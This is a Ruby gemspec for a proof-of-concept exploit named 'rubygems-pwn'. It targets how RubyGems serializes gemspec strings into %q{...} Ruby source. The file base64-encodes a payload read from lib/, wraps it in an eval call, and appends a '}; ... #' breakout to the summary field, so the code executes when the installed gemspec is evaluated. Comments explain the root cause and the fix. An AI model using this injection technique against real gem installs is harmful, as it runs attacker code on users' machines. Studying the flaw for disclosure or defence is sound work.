# -*- encoding: utf-8 -*-
require 'base64'
# Gemspec for a proof-of-concept demonstrating how RubyGems' round-trip of a
# gemspec through Gem::Specification#ruby_code can turn metadata (here the
# summary string) into code that is evaluated. Nothing in this file executes
# the payload directly; it only builds the string that the vulnerable
# serializer later emits as Ruby source.
Gem::Specification.new do |s|
s.name = "rubygems-pwn"
s.version = "0.1.1"
s.authors = ["Postmodern"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/sophsec/rubygems-pwn"
# load the payload
# Plain Ruby source read from this gem's own lib/ directory. It is treated
# as text at this point, not required or evaled.
payload = File.read(File.join(File.dirname(__FILE__),'lib','rubygems-pwn','payload.rb'))
embed_code = lambda { |code|
# base64 encode our payload, to hide any special characters
# Base64.encode64 inserts newlines into its output; String#inspect turns
# them into "\n" escapes, so the whole thing becomes one double-quoted
# Ruby literal with no raw braces or quotes that could break the wrapper.
# The decoded text is handed to eval: that is the step at which the
# serialized metadata becomes executable code in the installing process.
"require('base64');eval(Base64.decode64(#{Base64.encode64(code).inspect}))"
}
escape_code = lambda { |code|
# escape RubyGems Gem::Specification#ruby_code escaping logic which
# simply wraps Strings in "%q{" and "}".
# The leading unmatched "}" terminates the %q{...} literal early, the
# embedded code then runs as an ordinary statement, and the trailing "#"
# comments out the closing "}" that ruby_code appends. The root cause is
# serializing attacker-controlled strings into Ruby source without
# escaping them; the defence is to emit properly escaped literals (e.g.
# String#dump) or, better, not to persist installed gemspecs as evaluated
# Ruby at all. NOTE(review): later RubyGems releases changed how
# ruby_code serializes Strings — confirm against the version under test.
"}; #{code} #"
}
s.description = %q{A Proof of Concept (PoC) exploit for an trivial Security vulnerability in how RubyGems converts YAML-dumped gemspecs, back into Ruby code, when installing RubyGems. This ties into the larger design mistake, of storing installed gemspecs as Ruby code; since evaling Ruby code was faster than loading YAML gemspecs. When handling data, it is safer to store it in a static format (YAML, XML, CSV), instead of executable code.}
# grab the first sentence of the description, and append our escaped code
# ^ anchors at a line start and the description is a single line, so [0]
# is the text up to (not including) the first period. The summary is the
# attribute that ruby_code later wraps in %q{...}, which is why the
# escaped code is attached here rather than to the description.
s.summary = s.description.match(/^[^\.]+/)[0] +
escape_code[embed_code[payload]]
s.files = ['README.rdoc']
s.require_paths = ["lib"]
end